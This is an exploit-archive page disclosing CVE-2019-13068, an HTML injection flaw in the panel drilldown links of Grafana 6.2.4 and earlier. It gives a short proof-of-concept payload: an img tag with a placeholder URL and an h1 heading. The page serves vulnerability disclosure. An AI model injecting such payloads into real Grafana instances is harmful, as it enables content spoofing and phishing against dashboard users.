Grafana 6.2.4 HTML Injection

Grafana 6.2.4 HTML Injection: Posted Mar 27, 2023; Authored by SimranJeet Singh; Grafana versions 6.2.4 and below suffer from an html injection vulnerability.; tags | exploit; advisories | CVE-2019-13068; SHA-256 | 3e927ef1d8d85e1b6491953172226840615fa792fbe5b75382d895b6764e0efb; Download | Favorite | View

Grafana 6.2.4 HTML Injection

# Exploit Title: Grafana <=6.2.4 - HTML Injection
# Date: 30-06-2019
# Exploit Author: SimranJeet Singh
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download/6.2.4
# Version: 6.2.4
# CVE : CVE-2019-13068

The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)

Payload used - <img src="[image_URL]"><h1>Hello</h1>

Best Regards,

SimranJeet

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Grafana 6.2.4 HTML Injection

Grafana 6.2.4 HTML Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Grafana 6.2.4 HTML Injection

Share This

Grafana 6.2.4 HTML Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems